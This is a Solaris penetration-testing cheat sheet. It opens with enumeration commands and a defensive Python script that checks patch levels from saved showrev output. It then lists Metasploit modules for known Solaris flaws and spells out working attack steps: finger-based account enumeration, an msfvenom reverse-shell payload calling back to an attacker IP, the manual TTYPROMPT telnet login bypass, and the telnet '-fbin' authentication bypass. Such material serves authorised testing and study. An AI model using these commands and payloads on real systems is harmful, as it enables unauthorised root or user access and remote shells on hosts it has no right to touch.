Solaris
Information gathering and exploitation
Enumeration
View patches:
showrev -p
Installed packages:
pkginfo OR pkginfo -x
Host information:
uname -a
Show IP interfaces:
ifconfig -a
Process list:
/usr/ucb/ps -auxww
Patch Check Advanced (PCA)
http://www.par.univie.ac.at/solaris/pca/
Patch Check Advanced (PCA) generates lists of installed and missing patches for Oracle Solaris systems and optionally downloads patches. It resolves dependencies between patches and installs them in the correct order. It can be the only tool you need for patch management, on a single machine or a complete network. It is a single Perl script that needs neither compilation nor installation, and it does not need root permissions to run. It works on all versions of Solaris, both SPARC and x86.
Usage:
./pca.pl -f . -l missing
produces a list of missing patches. The '.' is the directory PCA reads its input from, so save the uname, showrev and pkginfo output collected from the target and make sure the three files are in the current directory; this lets you run the check offline on your own machine. PCA also needs a current patchdiag.xref cross-reference file to know which patches exist for the target's release.
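When you only care about a handful of patches named in an advisory and do not have patchdiag.xref to hand, the check PCA does can be reproduced from the saved showrev -p output alone. The script below is an added example written for this page, not part of PCA or any Sun/Oracle tool: it parses the Patch: lines, keeps the highest installed revision per patch base ID, and honours the Obsoletes: field so a superseded patch counts as present when its successor is installed. The sample showrev output and the patch IDs in it are constructed for the demonstration (108528 is the Solaris 8 kernel update base ID; the revisions and obsoleted IDs are made up).

```python
#!/usr/bin/env python3
"""Check Solaris patch levels from saved "showrev -p" output.

Added example for this page; not part of PCA. showrev -p prints one line
per installed patch, e.g.
  Patch: 108528-29 Obsoletes: 108624-01 Requires:  Incompatibles:  Packages: SUNWcsr
where 108528 is the patch base ID and 29 the revision. The same base ID may
appear more than once (older revisions stay listed); the highest wins.
"""
import re

# Constructed sample output, not captured from a real host.
SAMPLE_SHOWREV = """\
Patch: 108528-13 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcar, SUNWcsr
Patch: 108528-29 Obsoletes: 108624-01, 108627-01 Requires:  Incompatibles:  Packages: SUNWcar, SUNWcsr
Patch: 110380-04 Obsoletes:  Requires:  Incompatibles:  Packages: SUNWcsu
Patch: 108993-18 Obsoletes:  Requires: 108528-13 Incompatibles:  Packages: SUNWcsl
"""

PATCH_LINE = re.compile(r"^Patch:\s+(\d{6})-(\d{2})\b")
OBSOLETES = re.compile(r"Obsoletes:\s*(.*?)\s*Requires:")
PATCH_ID = re.compile(r"(\d{6})-(\d{2})")


def parse_showrev(text):
    """Return (installed, obsoleted_by).

    installed:    {base_id: highest revision seen}
    obsoleted_by: {obsoleted base_id: base_id of the patch that obsoletes it}
    """
    installed, obsoleted_by = {}, {}
    for line in text.splitlines():
        m = PATCH_LINE.match(line)
        if not m:
            continue                      # header or unrelated line
        base, rev = m.group(1), int(m.group(2))
        installed[base] = max(installed.get(base, 0), rev)
        obs = OBSOLETES.search(line)
        for old_base, _ in PATCH_ID.findall(obs.group(1) if obs else ""):
            obsoleted_by[old_base] = base
    return installed, obsoleted_by


def is_installed(required, installed, obsoleted_by):
    """True if patch "BASE-RR" is present at revision >= RR, either directly
    or because a patch that obsoletes BASE is installed."""
    base, rev = required.split("-")
    if installed.get(base, 0) >= int(rev):
        return True
    return obsoleted_by.get(base) in installed


def missing_patches(required, showrev_text):
    """Subset of `required` (list of "BASE-RR" strings) not satisfied on the host."""
    installed, obsoleted_by = parse_showrev(showrev_text)
    return [p for p in required if not is_installed(p, installed, obsoleted_by)]


if __name__ == "__main__":
    # Placeholder IDs standing in for whatever the advisory you are checking
    # names; they are not claims about specific fixes.
    wanted = ["108528-29", "110380-05", "108624-01", "111111-02"]
    print("missing:", missing_patches(wanted, SAMPLE_SHOWREV))
```

Feed it the real file with `missing_patches(wanted, open("showrev.out").read())`. Treating an obsoleting patch as satisfying the obsoleted one is the same rule PCA applies; without it a fully patched host shows spurious gaps.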
Common Solaris Vulnerabilities
The first word on each line is the Metasploit module name (for example exploit/solaris/sadmind/sadmind_exec); ** marks issues that can also be exploited by hand through a telnet client.
Solaris 7
sadmind_exec SADMIND - weakness in default security settings (AUTH_SYS credentials accepted) - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in Solaris login triggered through the TTYPROMPT environment variable - manual through telnet client
sendmail_exec LPD - line printer daemon arbitrary file write, used to drop a sendmail configuration and run commands - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow, TCP port 6112, runs as root
ypupdated_exec YPUPDATED - weakness in handling of the command shell (command injection) - allows root
kcms_readfile KCMS / TTDBSERVERD - remote file read (only in msf2)
Solaris 8
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in Solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon arbitrary file write abused via sendmail - allows root
heap_noir DTSPCD - CDE common desktop environment heap overflow, TCP port 6112, runs as root
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in the adm_build_path() function
kcms_readfile KCMS / TTDBSERVERD - remote file read (only in msf2)
Solaris 9
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
sadmind_adm_build_path SADMIND - stack buffer overflow in the adm_build_path() function
kcms_readfile KCMS / TTDBSERVERD - remote file read (only in msf2)
Solaris 10
fuser TELNET - authentication bypass: in.telnetd passes the client's USER value to login as an argument, so a value of -f<user> skips authentication - can be exploited by hand
ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root
Solaris 11
fuser TELNET - authentication bypass via -f<user> in the USER value - can be exploited by hand
Exploits
Solaris 8 finger (user enumeration)
finger '1 2 3 4 5 6 7 8 9 0'@target
in.fingerd on Solaris 8 answers this query with the list of local accounts, which gives you usernames for the telnet attacks below.
Solaris exploits
https://github.com/0xdea/exploits
raptor_passwd (local privilege escalation through passwd(1) on Solaris 8/9)
Msfvenom payload
msfvenom -p solaris/x86/shell_reverse_tcp LHOST=10.10.14.6 LPORT=5555 -f elf > /root/Desktop/raj.elf
This is an x86 payload; check uname -a (or uname -p) first and use the matching solaris/sparc/shell_reverse_tcp payload on SPARC hosts.
TTYPROMPT exploit
Solaris TTYPROMPT Security Vulnerability (Telnet, CVE-2001-0797)
This vulnerability is very simple to exploit, since it does not require the attacker to compile any code. The attacker only has to define the environment variable TTYPROMPT to a 6-character string inside the telnet client. Jonathan believes this overflows an integer inside login that records whether the user has been authenticated (just a guess).
Once connected to the remote host, type the username followed by 64 repetitions of " c" (a space and the letter c) and a literal newline. You will then be logged in as that user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Example (manual, through the telnet client):
$ telnet
telnet> environ define TTYPROMPT abcdef
telnet> open target
login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
Metasploit:
msf > use exploit/solaris/telnet/ttyprompt
Solaris in.telnetd TTYPROMPT Buffer Overflow
Telnet exploit (fuser)
Exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11 (CVE-2007-0882): in.telnetd hands the USER variable sent by the client to login as "-l <user>" without checking it, so a value that starts with -f makes login treat that user as already authenticated.
Command line:
telnet -l "-fbin" target
(use -froot only if remote root login is permitted; by default CONSOLE=/dev/console in /etc/default/login restricts root to the console)
Metasploit:
msf > use exploit/solaris/telnet/fuser